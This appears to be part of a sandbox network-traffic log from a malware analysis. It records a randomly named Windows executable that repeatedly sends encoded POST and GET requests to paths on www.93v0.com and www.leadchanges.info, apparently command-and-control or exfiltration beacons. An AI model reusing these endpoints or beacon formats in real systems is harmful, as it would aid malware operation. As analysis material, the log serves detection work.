Jun 5, 2024 18:29:39.487325907 CEST	424	IN	Data Raw: 2e 30 30 36 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 39 36 34 2d 31 2e 32 36 39 4c 31 37 2e 38 2c 32 38 31 2e 30 36 39 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 39 32 37 2e 35 33 37 6c 32 2e 34 31 39 2c 38 2e 36 36 38 41 31 2c 31 2c 30 2c 30 2c 30 2c 31 Data Ascii: .006a1,1,0,0,0,.964-1.269L17.8,281.069a1,1,0,0,0-1.927.537l2.419,8.668A1,1,0,0,0,19.257,291.006Z" fill="#226d7a"/><path d="M13.216,264.635a6.979,6.979,0,0,0,3.394-10.8l6.242-6.052a1,1,0,1,0-1.393-1.435L15.2,252.413A7,7,0,1,0,11,265c.08,0,.158-
Jun 5, 2024 18:29:39.487421989 CEST	1236	IN	Data Raw: 30 38 2c 30 2c 30 2c 30 2d 37 2d 37 63 2d 2e 30 38 2c 30 2d 2e 31 35 38 2e 30 30 39 2d 2e 32 33 37 2e 30 31 32 6c 2d 32 2e 31 32 33 2d 37 2e 36 30 36 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 39 32 37 2e 35 33 37 6c 32 2e 30 37 32 2c 37 2e 34 32 32 Data Ascii: 08,0,0,0-7-7c-.08,0-.158.009-.237.012l-2.123-7.606a1,1,0,0,0-1.927.537l2.072,7.422a7,7,0,1,0,8.847,8.859l7.737,2.235a1.025,1.025,0,0,0,.278.039,1,1,0,0,0,.277-1.961ZM25,318a5,5,0,1,1,5-5A5.006,5.006,0,0,1,25,318Z" fill="#226d7a"/><path d="M57.
Jun 5, 2024 18:29:39.487441063 CEST	1236	IN	Data Raw: 2e 39 35 32 2c 30 2c 30 2c 30 2c 35 32 2c 32 32 34 5a 6d 30 2d 31 32 61 35 2c 35 2c 30 2c 31 2c 31 2d 35 2c 35 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 35 32 2c 32 31 32 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c Data Ascii: .952,0,0,0,52,224Zm0-12a5,5,0,1,1-5,5A5.006,5.006,0,0,1,52,212Z" fill="#226d7a"/><path d="M122,281a6.984,6.984,0,0,0-1.218.113l-2.362-8.03a1,1,0,0,0-1.919.564l2.381,8.1a6.972,6.972,0,0,0-2.492,10.427l-6.242,6.052a1,1,0,0,0,1.393,1.435l6.259-6.
Jun 5, 2024 18:29:39.487454891 CEST	424	IN	Data Raw: 39 34 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 31 37 36 2c 31 2e 36 31 38 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 39 35 2e 37 2c 31 39 38 2e 33 36 36 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 31 37 36 Data Ascii: 94a1,1,0,0,0-1.176,1.618Z" fill="#226d7a"/><path d="M995.7,198.366a1,1,0,0,0-1.176,1.617l7.28,5.293a.986.986,0,0,0,.587.192,1,1,0,0,0,.588-1.809Z" fill="#226d7a"/><path d="M1002.5,232.72a1,1,0,0,0-1.366.365l-4.5,7.793a1,1,0,1,0,1.732,1l4.5-7.7
Jun 5, 2024 18:29:39.487492085 CEST	1236	IN	Data Raw: 4d 39 35 31 2e 38 2c 32 32 36 2e 34 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 36 2c 31 2e 32 6c 35 2e 34 2c 37 2e 32 61 31 2c 31 2c 30 2c 31 2c 30 2c 31 2e 36 2d 31 2e 32 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 Data Ascii: M951.8,226.4a1,1,0,0,0-1.6,1.2l5.4,7.2a1,1,0,1,0,1.6-1.2Z" fill="#226d7a"/><path d="M962.6,240.8A1,1,0,0,0,961,242l5.4,7.2A1,1,0,0,0,968,248Z" fill="#226d7a"/><path d="M931.091,198.789a6.943,6.943,0,0,0,1.777-6.129l7.473-4.185a1,1,0,1,0-.977-1
Jun 5, 2024 18:29:39.492165089 CEST	1236	IN	Data Raw: 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 31 30 31 32 2c 32 31 37 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 38 32 2c 32 36 31 61 36 2e 39 34 31 2c 36 2e 39 34 31 2c 30 2c 30 2c 30 2d 33 2e 35 32 37 2e 39 Data Ascii: 5.006,0,0,1,1012,217Z" fill="#226d7a"/><path d="M982,261a6.941,6.941,0,0,0-3.527.964L973.4,255.2a1,1,0,1,0-1.6,1.2l5.109,6.812A6.99,6.99,0,1,0,982,261Zm0,12a5,5,0,1,1,5-5A5.006,5.006,0,0,1,982,273Z" fill="#226d7a"/><path d="M19,32H11V24a1,1,0,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49748	18.178.206.118	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:53.513837099 CEST	690	OUT	POST /hcaw/ HTTP/1.1 Host: www.93v0.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.93v0.com Referer: http://www.93v0.com/hcaw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 33 75 42 44 65 74 77 74 76 68 52 70 78 72 53 67 58 33 4a 46 2f 56 75 67 4b 50 31 36 42 41 63 59 75 6f 69 43 6d 37 65 6d 4c 6b 68 5a 33 32 6c 61 50 34 6e 4b 31 50 47 6b 76 63 72 44 51 53 64 64 32 67 7a 68 6a 69 6e 49 6c 58 6e 57 30 4d 73 2b 74 79 4c 59 7a 4d 32 54 39 5a 72 4b 74 4a 74 74 36 66 41 33 43 44 2b 79 6a 44 55 36 5a 2b 2f 59 6f 61 57 56 4f 56 39 58 65 4d 33 32 71 48 66 47 66 47 34 37 65 74 61 54 4f 7a 4f 72 36 6e 7a 4c 4a 51 72 4c 76 6e 66 75 74 39 69 34 42 51 42 39 41 4c 6d 5a 32 78 37 75 6d 73 38 62 32 7a 6c 53 57 37 37 4f 71 39 34 50 49 4a 4c 37 6b 4b 48 58 69 36 68 4c 50 41 3d 3d Data Ascii: 9d=aYRfiZpqinkB3uBDetwtvhRpxrSgX3JF/VugKP16BAcYuoiCm7emLkhZ32laP4nK1PGkvcrDQSdd2gzhjinIlXnW0Ms+tyLYzM2T9ZrKtJtt6fA3CD+yjDU6Z+/YoaWVOV9XeM32qHfGfG47etaTOzOr6nzLJQrLvnfut9i4BQB9ALmZ2x7ums8b2zlSW77Oq94PIJL7kKHXi6hLPA==
Jun 5, 2024 18:29:54.513753891 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:29:54 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49749	18.178.206.118	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:56.051960945 CEST	710	OUT	POST /hcaw/ HTTP/1.1 Host: www.93v0.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.93v0.com Referer: http://www.93v0.com/hcaw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 78 50 52 44 59 4f 59 74 6b 68 52 32 39 4c 53 67 43 48 4a 42 2f 56 53 67 4b 4f 42 55 41 32 6b 59 74 4a 53 43 68 36 65 6d 43 30 68 5a 2f 57 6c 44 42 59 6e 2f 31 50 4c 45 76 64 37 44 51 53 4a 64 32 69 37 68 69 52 50 58 6e 48 6d 77 34 73 73 77 79 69 4c 59 7a 4d 32 54 39 61 58 73 74 4a 6c 74 37 75 77 33 44 6d 4c 6b 38 7a 55 31 50 4f 2f 59 6a 36 58 53 4f 56 38 43 65 4a 75 6a 71 45 33 47 66 44 55 37 65 2f 2b 51 41 7a 4f 58 30 48 79 70 41 52 32 52 6c 46 7a 4d 6e 74 53 66 41 44 51 59 42 39 37 37 73 54 33 43 34 39 45 67 79 78 42 6b 42 64 6d 37 6f 38 38 58 46 72 2f 61 37 39 69 39 76 6f 41 50 5a 77 42 4f 6a 4d 75 59 46 46 4a 70 68 63 38 6d 6a 58 53 61 34 62 4d 3d Data Ascii: 9d=aYRfiZpqinkBxPRDYOYtkhR29LSgCHJB/VSgKOBUA2kYtJSCh6emC0hZ/WlDBYn/1PLEvd7DQSJd2i7hiRPXnHmw4sswyiLYzM2T9aXstJlt7uw3DmLk8zU1PO/Yj6XSOV8CeJujqE3GfDU7e/+QAzOX0HypAR2RlFzMntSfADQYB977sT3C49EgyxBkBdm7o88XFr/a79i9voAPZwBOjMuYFFJphc8mjXSa4bM=
Jun 5, 2024 18:29:57.068013906 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:29:56 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49750	18.178.206.118	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:58.585136890 CEST	1723	OUT	POST /hcaw/ HTTP/1.1 Host: www.93v0.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.93v0.com Referer: http://www.93v0.com/hcaw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 78 50 52 44 59 4f 59 74 6b 68 52 32 39 4c 53 67 43 48 4a 42 2f 56 53 67 4b 4f 42 55 41 32 73 59 74 37 71 43 68 5a 6d 6d 59 30 68 5a 6a 47 6c 47 42 59 6e 69 31 50 44 49 76 59 6a 54 51 51 78 64 30 48 33 68 79 30 37 58 75 48 6d 77 6c 38 73 39 74 79 4b 46 7a 4e 48 62 39 5a 2f 73 74 4a 6c 74 37 74 34 33 58 44 2f 6b 76 6a 55 36 5a 2b 2b 5a 6f 61 58 32 4f 56 6b 53 65 4a 69 7a 71 56 58 47 66 6a 45 37 5a 4e 6d 51 49 7a 4f 56 6b 58 79 50 41 52 37 50 6c 46 2f 41 6e 74 57 6c 41 42 41 59 4d 36 43 35 33 51 7a 49 6a 4e 41 57 73 67 4a 43 50 62 32 59 76 38 34 31 62 72 2f 6a 77 2b 69 56 73 62 77 4f 61 33 4d 52 36 73 53 5a 63 52 6f 39 6f 49 64 4e 6e 69 2b 53 69 63 6c 67 68 71 6e 48 69 33 4e 69 62 67 56 66 6e 71 30 4d 50 43 61 4d 4c 68 51 38 54 30 50 6a 77 67 75 5a 56 70 71 35 72 71 76 30 34 5a 32 56 78 69 32 5a 4e 51 55 35 4d 50 6e 6f 70 62 6a 73 79 77 37 61 46 66 33 49 71 7a 6f 31 48 47 75 65 4a 6c 36 55 55 73 58 4d 6c 6f 64 66 7a 63 6a 4f 51 4c 48 4f 34 4a 73 46 6c 6a 78 [TRUNCATED] Data Ascii: 9d=aYRfiZpqinkBxPRDYOYtkhR29LSgCHJB/VSgKOBUA2sYt7qChZmmY0hZjGlGBYni1PDIvYjTQQxd0H3hy07XuHmwl8s9tyKFzNHb9Z/stJlt7t43XD/kvjU6Z++ZoaX2OVkSeJizqVXGfjE7ZNmQIzOVkXyPAR7PlF/AntWlABAYM6C53QzIjNAWsgJCPb2Yv841br/jw+iVsbwOa3MR6sSZcRo9oIdNni+SiclghqnHi3NibgVfnq0MPCaMLhQ8T0PjwguZVpq5rqv04Z2Vxi2ZNQU5MPnopbjsyw7aFf3Iqzo1HGueJl6UUsXMlodfzcjOQLHO4JsFljx230GuGI1Lh+bIiOi1DfmXuegr2Tx47scP7A15Naw6evioe3zKduPsYP6k2jvdzkND3rtDuF+9BbCxqJHc914cmqF0NRsAMvb/Hdvkiu9AVmvFPuDj5Bwj2D9zK5dSjhHFouEltHlpEQGrR2wM4rdS1J1e+hOfCVhEEwtPkGw/WZsGVc8gF+OpBlUDRtuyEYcunQOnAiEuNBKUPMOinZ9xon0PT9UKKYDqOrrSqSQNM/p1cg9/IJudY8rW6SCabLMew0NmVihBayqdPxDaxTJ1ytkfB2xQyFPJqxJ++PeuAVjGYUWdVw6/T6hccKqfhP3KJfKOm/mg0w8LT5Dj4H9c3E8+Ue2yg83pSrJ4V8BrdHFrDeJTgbku46EmjfySzmwsj/tnnTtV+sVD6Gjbn9D++SE7uN/FnqsgzbBJ2H6eciWoJOAN9pf0KgBH1FJ9B9Qntx8UJsVwZEz+Dx3bEJPnihpzQ06uVTllTCWZvIOBuEfqVEtm7aDKh0LAaZe+R5e0i9EQsR63/zOGeclCdZy4L5nSM+Z692jnZIOJidOsL1FFYDBWuyjZg8hnS+WHHzuxGMtlxAlIlAWGgugTugczVoRKU5BelmHmo+P0TuNfnKBLnLXM9Kp/RzmrW0TE/vjrAzm9m9V8SD0Qja3Pz1DLtnBI2F8nUNxUx [TRUNCATED]
Jun 5, 2024 18:29:59.592618942 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:29:59 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49751	18.178.206.118	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:30:01.133013010 CEST	443	OUT	GET /hcaw/?9d=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNpV/H8uI+lgidsfe724rSsodQ5uAfCV2elW9ENMTuv5SSVXQJAcj0qHHf&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.93v0.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:30:02.148477077 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:30:02 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49752	66.96.162.149	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:30:07.697262049 CEST	714	OUT	POST /mjuo/ HTTP/1.1 Host: www.leadchanges.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.leadchanges.info Referer: http://www.leadchanges.info/mjuo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 72 6c 54 61 72 49 45 49 75 2f 71 7a 43 66 35 52 4f 67 54 44 61 64 35 65 4c 4c 48 4a 6f 33 65 4f 49 36 68 47 41 2b 6d 30 37 6f 48 53 2b 78 42 31 2f 73 77 70 7a 49 65 76 61 30 38 66 4b 41 42 74 47 72 63 66 33 2f 61 54 75 35 34 6c 47 39 57 35 6d 37 47 52 7a 38 44 4b 6d 57 6f 59 5a 4f 68 44 6a 46 37 2b 78 58 4a 37 5a 58 48 46 37 54 79 34 54 32 71 71 69 7a 6c 62 42 6e 4e 4d 4c 5a 53 75 39 48 50 52 57 67 47 70 6b 45 6e 73 49 45 61 65 6a 67 31 34 31 63 6b 41 54 44 64 6a 68 4d 75 63 4f 55 74 38 51 61 4d 31 72 65 62 56 51 38 67 64 46 39 37 65 41 4e 4d 51 52 6b 6a 59 62 79 30 7a 52 4e 64 5a 57 41 3d 3d Data Ascii: 9d=LWibrjoHVkt6rlTarIEIu/qzCf5ROgTDad5eLLHJo3eOI6hGA+m07oHS+xB1/swpzIeva08fKABtGrcf3/aTu54lG9W5m7GRz8DKmWoYZOhDjF7+xXJ7ZXHF7Ty4T2qqizlbBnNMLZSu9HPRWgGpkEnsIEaejg141ckATDdjhMucOUt8QaM1rebVQ8gdF97eANMQRkjYby0zRNdZWA==
Jun 5, 2024 18:30:08.381361961 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:30:08 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49753	66.96.162.149	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:30:10.239268064 CEST	734	OUT	POST /mjuo/ HTTP/1.1 Host: www.leadchanges.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.leadchanges.info Referer: http://www.leadchanges.info/mjuo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 35 30 6a 61 6e 4c 73 49 35 50 71 79 50 50 35 52 42 41 54 48 61 64 31 65 4c 4b 43 4d 76 43 75 4f 49 62 39 47 48 38 65 30 36 6f 48 53 31 52 42 77 78 4d 77 2b 7a 49 61 52 61 31 77 66 4b 41 56 74 47 76 51 66 33 4d 79 51 76 70 34 6a 4b 64 58 2f 34 4c 47 52 7a 38 44 4b 6d 57 4e 39 5a 4f 35 44 6a 56 4c 2b 6a 69 6b 74 61 58 48 43 79 7a 79 34 5a 57 71 75 69 7a 6c 6c 42 6a 74 32 4c 61 6d 75 39 46 58 52 57 78 47 32 72 45 6d 6e 4d 45 62 57 79 7a 6f 61 78 4f 59 64 55 77 78 69 6f 4f 65 50 4c 69 77 65 4b 34 41 5a 31 50 6a 75 55 2b 45 72 53 62 6d 72 43 4d 49 49 63 47 58 35 45 46 52 5a 63 66 38 64 41 7a 42 71 2b 39 74 57 4e 51 52 56 36 58 51 6d 52 56 5a 42 71 6b 49 3d Data Ascii: 9d=LWibrjoHVkt650janLsI5PqyPP5RBATHad1eLKCMvCuOIb9GH8e06oHS1RBwxMw+zIaRa1wfKAVtGvQf3MyQvp4jKdX/4LGRz8DKmWN9ZO5DjVL+jiktaXHCyzy4ZWquizllBjt2Lamu9FXRWxG2rEmnMEbWyzoaxOYdUwxioOePLiweK4AZ1PjuU+ErSbmrCMIIcGX5EFRZcf8dAzBq+9tWNQRV6XQmRVZBqkI=
Jun 5, 2024 18:30:10.922113895 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:30:10 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 